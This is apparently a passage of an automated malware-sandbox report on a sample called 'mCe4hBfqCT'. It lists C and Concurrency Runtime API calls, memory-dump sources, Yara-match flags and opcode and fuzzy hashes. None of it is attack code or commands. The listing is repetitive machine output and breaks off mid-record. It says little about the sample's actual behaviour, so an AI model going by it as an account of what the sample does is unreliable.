                                                  • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0041BF39
                                                  • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0041BF49
                                                  • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0041BF5D
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: Compare_exchange_acquire_4std::_
                                                  • String ID:
                                                  • API String ID: 3973403980-0
                                                  • Opcode ID: 3b89475e2bdafd6ed96e14fd4d006d48e41723d7c24de3c610b0d4f4f0c7b455
                                                  • Instruction ID: 72732f5efe9b63b971529a3f0cd962c81f2cd17cb7f3a1b82d9d198b59e5c030
                                                  • Opcode Fuzzy Hash: 3b89475e2bdafd6ed96e14fd4d006d48e41723d7c24de3c610b0d4f4f0c7b455
                                                  • Instruction Fuzzy Hash: FB01F63608414DBBCF129E64DC428EE3B26EB08354B148416FD18C4232C336CAB2AF8E
                                                  APIs
                                                  • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0302C190
                                                  • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0302C1A0
                                                  • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0302C1B0
                                                  • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0302C1C4
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3010000_mCe4hBfqCT.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Compare_exchange_acquire_4std::_
                                                  • String ID:
                                                  • API String ID: 3973403980-0
                                                  • Opcode ID: 3b89475e2bdafd6ed96e14fd4d006d48e41723d7c24de3c610b0d4f4f0c7b455
                                                  • Instruction ID: bf3687618913fb660930e8b861fc073e2ae402c074699cfca63c8cb041fbdf2b
                                                  • Opcode Fuzzy Hash: 3b89475e2bdafd6ed96e14fd4d006d48e41723d7c24de3c610b0d4f4f0c7b455
                                                  • Instruction Fuzzy Hash: 0301313B006129BBEF61DF58DC029AE3F66BF46250F188412F91898430D332C770EB82
                                                  APIs
                                                  • Concurrency::details::LockQueueNode::LockQueueNode.LIBCONCRT ref: 004110FB
                                                    • Part of subcall function 0041096D: Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 0041098F
                                                    • Part of subcall function 0041096D: Concurrency::details::RegisterAsyncTimerAndLoadLibrary.LIBCONCRT ref: 004109B0
                                                  • Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 0041110E
                                                  • Concurrency::critical_section::_Switch_to_active.LIBCMT ref: 0041111A
                                                  • Concurrency::details::LockQueueNode::DerefTimerNode.LIBCONCRT ref: 00411123
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: Concurrency::details::$LockQueue$Concurrency::critical_section::_NodeNode::Timer$Acquire_lockAsyncBase::ContextCurrentDerefLibraryLoadRegisterSchedulerSwitch_to_active
                                                  • String ID:
                                                  • API String ID: 4284812201-0
                                                  • Opcode ID: 579a0525b44f01270be9ef68fc27b73e08c7f2f833de457b821bb81fd48d1548
                                                  • Instruction ID: 32ef31896b2cb6abdcbb34161c10e74fd4bf83775755d0cce9f66a209d269357
                                                  • Opcode Fuzzy Hash: 579a0525b44f01270be9ef68fc27b73e08c7f2f833de457b821bb81fd48d1548
                                                  • Instruction Fuzzy Hash: 5EF02470A8020467DF24BBA648525EE72954F84328F14003FB7126B7D2CEBC4DC2929C
                                                  APIs
                                                  • Concurrency::details::LoadLibraryAndCreateThread.LIBCONCRT ref: 00413545
                                                    • Part of subcall function 004128CF: ___crtGetTimeFormatEx.LIBCMT ref: 004128E5
                                                    • Part of subcall function 004128CF: Concurrency::details::ReferenceLoadLibrary.LIBCONCRT ref: 00412904
                                                  • GetLastError.KERNEL32 ref: 00413561
                                                  • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00413577
                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00413585
                                                    • Part of subcall function 004126A5: SetThreadPriority.KERNEL32(?,?), ref: 004126B1
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: Concurrency::details::LibraryLoadThread$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorException@8FormatLastPriorityReferenceThrowTime___crt
                                                  • String ID:
                                                  • API String ID: 1674182817-0
                                                  • Opcode ID: 93dc6e6853861ab66bbf85d3994f28224c3287503f93e908fd108eb425b3b23d
                                                  • Instruction ID: d4d0e34155d1b65ea1fa919a817b0ae51ac78690af07c02d22dcd9fb344bc12c
                                                  • Opcode Fuzzy Hash: 93dc6e6853861ab66bbf85d3994f28224c3287503f93e908fd108eb425b3b23d
                                                  • Instruction Fuzzy Hash: 80F0E2B1A002193AE720BA765D07FFB369C9B00B90F90081BB905E6082EDDCD95042BC
                                                  APIs
                                                  • Concurrency::details::LoadLibraryAndCreateThread.LIBCONCRT ref: 030237AC
                                                    • Part of subcall function 03022B36: ___crtGetTimeFormatEx.LIBCMT ref: 03022B4C
                                                    • Part of subcall function 03022B36: Concurrency::details::ReferenceLoadLibrary.LIBCONCRT ref: 03022B6B
                                                  • GetLastError.KERNEL32 ref: 030237C8
                                                  • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 030237DE
                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 030237EC
                                                    • Part of subcall function 0302290C: SetThreadPriority.KERNEL32(?,?), ref: 03022918
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3010000_mCe4hBfqCT.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Concurrency::details::LibraryLoadThread$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorException@8FormatLastPriorityReferenceThrowTime___crt
                                                  • String ID:
                                                  • API String ID: 1674182817-0
                                                  • Opcode ID: 93dc6e6853861ab66bbf85d3994f28224c3287503f93e908fd108eb425b3b23d
                                                  • Instruction ID: 1ff749c7dcaa953faf4b21add90ea85feaa4bcc8fa0b01b7b6c67f403237aaeb
                                                  • Opcode Fuzzy Hash: 93dc6e6853861ab66bbf85d3994f28224c3287503f93e908fd108eb425b3b23d
                                                  • Instruction Fuzzy Hash: 7EF082B66413293AE760F7B54C06FFB3A9C9B41651F540C5AB905EA080E998E40487A8
                                                  APIs
                                                  • Concurrency::details::LockQueueNode::LockQueueNode.LIBCONCRT ref: 03021362
                                                    • Part of subcall function 03020BD4: Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 03020BF6
                                                    • Part of subcall function 03020BD4: Concurrency::details::RegisterAsyncTimerAndLoadLibrary.LIBCONCRT ref: 03020C17
                                                  • Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 03021375
                                                  • Concurrency::critical_section::_Switch_to_active.LIBCMT ref: 03021381
                                                  • Concurrency::details::LockQueueNode::DerefTimerNode.LIBCONCRT ref: 0302138A
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3010000_mCe4hBfqCT.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Concurrency::details::$LockQueue$Concurrency::critical_section::_NodeNode::Timer$Acquire_lockAsyncBase::ContextCurrentDerefLibraryLoadRegisterSchedulerSwitch_to_active
                                                  • String ID:
                                                  • API String ID: 4284812201-0
                                                  • Opcode ID: 7cc60c53a006b7c0a8f5f6fa39395797a6efdddb6a6f80acb77e5e57232fdb4f
                                                  • Instruction ID: 4479d1828a1028422b87ac7a7a096cc5a9f8d9517ef999f92eae3eb3854083f2
                                                  • Opcode Fuzzy Hash: 7cc60c53a006b7c0a8f5f6fa39395797a6efdddb6a6f80acb77e5e57232fdb4f
                                                  • Instruction Fuzzy Hash: A2F0BE34687728A7AF68FAA448509FE6A9B5FD0220F080269A512AF7C0CE758D05939C
                                                  APIs
                                                  • Concurrency::details::SchedulerProxy::GetCurrentThreadExecutionResource.LIBCMT ref: 0302D0A8
                                                  • Concurrency::details::ResourceManager::RemoveExecutionResource.LIBCONCRT ref: 0302D0CC
                                                  • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0302D0DF
                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 0302D0ED
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3010000_mCe4hBfqCT.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Resource$Concurrency::details::Execution$CurrentException@8Manager::Proxy::RemoveSchedulerThreadThrowstd::invalid_argument::invalid_argument
                                                  • String ID:
                                                  • API String ID: 3657713681-0
                                                  • Opcode ID: 9390b3195b713983fe10ad4c3c6d405898b6246382bfd66b9966ffe9dd40d037
                                                  • Instruction ID: 4e8b8ea9ed7975a01fb06a790957e7ec499de39c7b75539af34407d84ed4eaa4
                                                  • Opcode Fuzzy Hash: 9390b3195b713983fe10ad4c3c6d405898b6246382bfd66b9966ffe9dd40d037
                                                  • Instruction Fuzzy Hash: C9F0593990232463C724EB54D890DEDFBB98ED1B14324896BD8161B191DB35AD0AC361
                                                  APIs
                                                  • RegisterWaitForSingleObject.KERNEL32(?,00000000,004235B2,000000A4,000000FF,0000000C), ref: 00412628
                                                  • GetLastError.KERNEL32(?,?,?,?,004185E9,?,?,?,?,00000000,?,00000000), ref: 00412637
                                                  • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0041264D
                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 0041265B
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastObjectRegisterSingleThrowWait
                                                  • String ID:
                                                  • API String ID: 3803302727-0
                                                  • Opcode ID: e4f9fab13c1926d2e81b23feee93bab4e40d19f09818ad509d0e3559ff61ead6
                                                  • Instruction ID: 0dfe4b91b17fca29e91fbe1ee06f4a4a2df34707d6a261af2a3e5670f24271a8
                                                  • Opcode Fuzzy Hash: e4f9fab13c1926d2e81b23feee93bab4e40d19f09818ad509d0e3559ff61ead6
                                                  • Instruction Fuzzy Hash: 34F0A07460010EBBCF10EFA5DE45EEF37686B00705F600656B514E20E1DA78DA149768
                                                  APIs
                                                  • std::_Cnd_initX.LIBCPMT ref: 03015AA8
                                                  • __Cnd_signal.LIBCPMT ref: 03015AB4
                                                  • std::_Cnd_initX.LIBCPMT ref: 03015AC9
                                                  • __Cnd_do_broadcast_at_thread_exit.LIBCPMT ref: 03015AD0
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3010000_mCe4hBfqCT.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Cnd_initstd::_$Cnd_do_broadcast_at_thread_exitCnd_signal
                                                  • String ID:
                                                  • API String ID: 2059591211-0
                                                  • Opcode ID: 16e91ae191353f76377487b504f8ad98fae09f0c97f906459e9bfe3258fa4ce0
                                                  • Instruction ID: 7533bc5073aafe963ca00c8ff770ad88425b3d8f981881a3aa2abad82812434c
                                                  • Opcode Fuzzy Hash: 16e91ae191353f76377487b504f8ad98fae09f0c97f906459e9bfe3258fa4ce0
                                                  • Instruction Fuzzy Hash: 70F0A03A002701ABEB35FB20C8157EAB7A0AFC0324F144519D1965E9A0CFBAA8659755
                                                  APIs
                                                  • RegisterWaitForSingleObject.KERNEL32(?,00000000,004235B2,000000A4,000000FF,0000000C), ref: 0302288F
                                                  • GetLastError.KERNEL32(?,?,?,?,03028850,?,?,?,?,00000000,?,00000000), ref: 0302289E
                                                  • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 030228B4
                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 030228C2
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3010000_mCe4hBfqCT.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastObjectRegisterSingleThrowWait
                                                  • String ID:
                                                  • API String ID: 3803302727-0
                                                  • Opcode ID: e4f9fab13c1926d2e81b23feee93bab4e40d19f09818ad509d0e3559ff61ead6
                                                  • Instruction ID: 4c05d851f7f4d654fa459e80c87eed69619f2528ac9546fa56bc798b3deb1678
                                                  • Opcode Fuzzy Hash: e4f9fab13c1926d2e81b23feee93bab4e40d19f09818ad509d0e3559ff61ead6
                                                  • Instruction Fuzzy Hash: 88F0A03550121ABBCF00EFE4CD44EEF3BACAB00601F200A55FA14E60A0DB34D60497A4
                                                  APIs
                                                  • ___crtCreateEventExW.LIBCPMT ref: 0041234C
                                                  • GetLastError.KERNEL32(?,?,?,?,?,00410B59), ref: 0041235A
                                                  • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00412370
                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 0041237E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorEventException@8LastThrow___crt
                                                  • String ID:
                                                  • API String ID: 200240550-0
                                                  • Opcode ID: 8f1a4222a24bf13f64463e6bb6d09cdc0fcbd04c53ea7d81c6ce3fbd118b929d
                                                  • Instruction ID: f5537a877189a90aa28975f9b1b11099a3717870695f97e2c6136de35ce4b3b1
                                                  • Opcode Fuzzy Hash: 8f1a4222a24bf13f64463e6bb6d09cdc0fcbd04c53ea7d81c6ce3fbd118b929d
                                                  • Instruction Fuzzy Hash: ADE0D871A0021E29E720B7768D07FBF369C6B00B45F54086BBD14E11C3FDACD61041AC
                                                  APIs
                                                  • ___crtCreateEventExW.LIBCPMT ref: 030225B3
                                                  • GetLastError.KERNEL32(?,?,?,?,?,03020DC0), ref: 030225C1
                                                  • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 030225D7
                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 030225E5
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3010000_mCe4hBfqCT.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorEventException@8LastThrow___crt
                                                  • String ID:
                                                  • API String ID: 200240550-0
                                                  • Opcode ID: 8f1a4222a24bf13f64463e6bb6d09cdc0fcbd04c53ea7d81c6ce3fbd118b929d
                                                  • Instruction ID: 2909da87015c845d0e9b7e63286a735c09fe7551c470b30ef6844bad19279b2c
                                                  • Opcode Fuzzy Hash: 8f1a4222a24bf13f64463e6bb6d09cdc0fcbd04c53ea7d81c6ce3fbd118b929d
                                                  • Instruction Fuzzy Hash: DEE0D8656013292AE750F7B44C02FBF3ADC9B00A41F544C55F914E90C1FDA4D50442A4
                                                  APIs
                                                    • Part of subcall function 00412712: TlsAlloc.KERNEL32(?,00410B59), ref: 00412718
                                                  • TlsAlloc.KERNEL32(?,00410B59), ref: 0042399F
                                                  • GetLastError.KERNEL32 ref: 004239B1
                                                  • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 004239C7
                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 004239D5
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: Alloc$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrow
                                                  • String ID:
                                                  • API String ID: 3735082963-0
                                                  • Opcode ID: 90a75019d660bb7e4688d3e898997b6e923421556ddb8c6bd1ae311c324a1122
                                                  • Instruction ID: 6dd5cecd5731d0fd3396096e4a73a475127880a88571f9a1564212530dcc10d0
                                                  • Opcode Fuzzy Hash: 90a75019d660bb7e4688d3e898997b6e923421556ddb8c6bd1ae311c324a1122
                                                  • Instruction Fuzzy Hash: C9E02BF45003245EC310BF72AD4A66F3274790170AB600E2BF015D2192EEBCD1844A9C
                                                  APIs
                                                    • Part of subcall function 03022979: TlsAlloc.KERNEL32(?,03020DC0), ref: 0302297F
                                                  • TlsAlloc.KERNEL32(?,03020DC0), ref: 03033C06
                                                  • GetLastError.KERNEL32 ref: 03033C18
                                                  • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 03033C2E
                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 03033C3C
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3010000_mCe4hBfqCT.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Alloc$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrow
                                                  • String ID:
                                                  • API String ID: 3735082963-0
                                                  • Opcode ID: 90a75019d660bb7e4688d3e898997b6e923421556ddb8c6bd1ae311c324a1122
                                                  • Instruction ID: 004a548afb9decb0bb15952aeb2888969bd2221ab9cda80b2082dbfc0ac28d95
                                                  • Opcode Fuzzy Hash: 90a75019d660bb7e4688d3e898997b6e923421556ddb8c6bd1ae311c324a1122
                                                  • Instruction Fuzzy Hash: DBE0687C501321AFC744FBB1ACC86BE7AACAA022027100E66F112C70A0EE38D248476C
                                                  APIs
                                                  • GetNumaHighestNodeNumber.KERNEL32(?,?,?,?,?,?,?,?,?,?,0000FFFF,00000000,?,00000000,?,00410B59), ref: 00412557
                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,0000FFFF,00000000,?,00000000,?,00410B59), ref: 00412566
                                                  • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0041257C
                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 0041258A
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8HighestLastNodeNumaNumberThrow
                                                  • String ID:
                                                  • API String ID: 3016159387-0
                                                  • Opcode ID: 90c6f96075c9eb6d4a06c4afc3ce6f74b9e2c23d697b5ba2851b3fb9f8cfd27c
                                                  • Instruction ID: 951ac86653187ea2db5183bbef748415e33b6f8be8890effbe132357fd44ea8b
                                                  • Opcode Fuzzy Hash: 90c6f96075c9eb6d4a06c4afc3ce6f74b9e2c23d697b5ba2851b3fb9f8cfd27c
                                                  • Instruction Fuzzy Hash: 69E04874A0010DABC714EFB5DF49AEF73BC7A00A45FA00466A501E2151EA6CDB04977D
                                                  APIs
                                                  • GetNumaHighestNodeNumber.KERNEL32(?,?,?,?,?,?,?,?,?,?,0000FFFF,00000000,?,00000000,?,03020DC0), ref: 030227BE
                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,0000FFFF,00000000,?,00000000,?,03020DC0), ref: 030227CD
                                                  • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 030227E3
                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 030227F1
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3010000_mCe4hBfqCT.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8HighestLastNodeNumaNumberThrow
                                                  • String ID:
                                                  • API String ID: 3016159387-0
                                                  • Opcode ID: 90c6f96075c9eb6d4a06c4afc3ce6f74b9e2c23d697b5ba2851b3fb9f8cfd27c
                                                  • Instruction ID: 05263c7e7911039cd4fca5e6094f0a2c861ed1cd271721bca2fcb1d69968373a
                                                  • Opcode Fuzzy Hash: 90c6f96075c9eb6d4a06c4afc3ce6f74b9e2c23d697b5ba2851b3fb9f8cfd27c
                                                  • Instruction Fuzzy Hash: 30E04F7860121AA7CB40FBF59D49AAF77BC6A00A06B600866F505E6050EB68EB089779
                                                  APIs
                                                  • SetThreadPriority.KERNEL32(?,?), ref: 004126B1
                                                  • GetLastError.KERNEL32 ref: 004126BD
                                                  • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 004126D3
                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 004126E1
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastPriorityThreadThrow
                                                  • String ID:
                                                  • API String ID: 4286982218-0
                                                  • Opcode ID: a89e8ca6049c9b6ec2fd05d368a3b84ec4fd3d7342a975297e58808702deda3e
                                                  • Instruction ID: d6ad487b4c18070c6cf6a1f44c15ecb3f6d05e9c3d6252d545de6a15e1df0045
                                                  • Opcode Fuzzy Hash: a89e8ca6049c9b6ec2fd05d368a3b84ec4fd3d7342a975297e58808702deda3e
                                                  • Instruction Fuzzy Hash: BBE086746001196BCB24BF61DE06BFF376C7B00745F50082BB515D50A1EF7DD56486AC
                                                  APIs
                                                  • TlsSetValue.KERNEL32(?,00000000,00417991,00000000,?,?,00410B59,?,?,?,00000000,?,00000000), ref: 00412777
                                                  • GetLastError.KERNEL32(?,?,?,00000000,?,00000000), ref: 00412783
                                                  • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00412799
                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 004127A7
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrowValue
                                                  • String ID:
                                                  • API String ID: 1964976909-0
                                                  • Opcode ID: aac3effd464d41b8a5b5f51f1256ba0c29368646bc02732cdbcc67f1fe2b72fc
                                                  • Instruction ID: 402fe0f5bbe0f151a29ab6283833ac733f3ad497baf8671b47c41dc8f6c9e06d
                                                  • Opcode Fuzzy Hash: aac3effd464d41b8a5b5f51f1256ba0c29368646bc02732cdbcc67f1fe2b72fc
                                                  • Instruction Fuzzy Hash: F7E086746001196BDB20BF65DE09BFF37AC7F00745F50082AB515D50A1EE7DD564869C
                                                  APIs
                                                  • SetThreadPriority.KERNEL32(?,?), ref: 03022918
                                                  • GetLastError.KERNEL32 ref: 03022924
                                                  • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0302293A
                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 03022948
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3010000_mCe4hBfqCT.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastPriorityThreadThrow
                                                  • String ID:
                                                  • API String ID: 4286982218-0
                                                  • Opcode ID: a89e8ca6049c9b6ec2fd05d368a3b84ec4fd3d7342a975297e58808702deda3e
                                                  • Instruction ID: e057da1b19d0f7ce6227a299668ff88c24041382b6bb876ea81c816d3f510e40
                                                  • Opcode Fuzzy Hash: a89e8ca6049c9b6ec2fd05d368a3b84ec4fd3d7342a975297e58808702deda3e
                                                  • Instruction Fuzzy Hash: 65E08634101229B7CB54FFA1CC05BBF7BACAB01641B544D65F919D50A0EB35D104975C
                                                  APIs
                                                  • TlsSetValue.KERNEL32(?,00000000,03027BF8,00000000,?,?,03020DC0,?,?,?,00000000,?,00000000), ref: 030229DE
                                                  • GetLastError.KERNEL32(?,?,?,00000000,?,00000000), ref: 030229EA
                                                  • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 03022A00
                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 03022A0E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4504459250.0000000003010000.00000040.00001000.00020000.00000000.sdmp, Offset: 03010000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_3010000_mCe4hBfqCT.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrowValue
                                                  • String ID:
                                                  • API String ID: 1964976909-0
                                                  • Opcode ID: aac3effd464d41b8a5b5f51f1256ba0c29368646bc02732cdbcc67f1fe2b72fc
                                                  • Instruction ID: 5a4559b9c76a5f0ef3069614e27966552609c879d438217b90cf6d2241199171
                                                  • Opcode Fuzzy Hash: aac3effd464d41b8a5b5f51f1256ba0c29368646bc02732cdbcc67f1fe2b72fc
                                                  • Instruction Fuzzy Hash: B7E0863410122967DB50FFA5CC09BBF7BACAF00641B544D25F919D50A0DB39D1149798
                                                  APIs
                                                  • TlsAlloc.KERNEL32(?,00410B59), ref: 00412718
                                                  • GetLastError.KERNEL32 ref: 00412725
                                                  • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0041273B
                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 00412749
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.4502940615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_mCe4hBfqCT.jbxd
                                                  Similarity
                                                  • API ID: AllocConcurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorErrorException@8LastThrow
                                                  • String ID:
                                                  • API String ID: 3103352999-0
                                                  • Opcode ID: ee2646b63a6430665b3080167d3f8e46aee4a193fb16d21d2dbfdc4c253f15bc
                                                  • Instruction ID: 41d26ccb9910f396398e3bce7d3f30876e3ac6ee5b10193dd838f65c512c27a9
                                                  • Opcode Fuzzy Hash: ee2646b63a6430665b3080167d3f8e46aee4a193fb16d21d2dbfdc4c253f15bc
                                                  • Instruction Fuzzy Hash: F8E0C274500119678728BB759E0AABF73687A01759BA00A6BF031D20E1EEACD45842AC
                                                  APIs
                                                  • TlsAlloc.KERNEL32(?,03020DC0), ref: 0302297F
                                                  • GetLastError.KERNEL32 ref: 0302298C
                                                  • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 030229A2
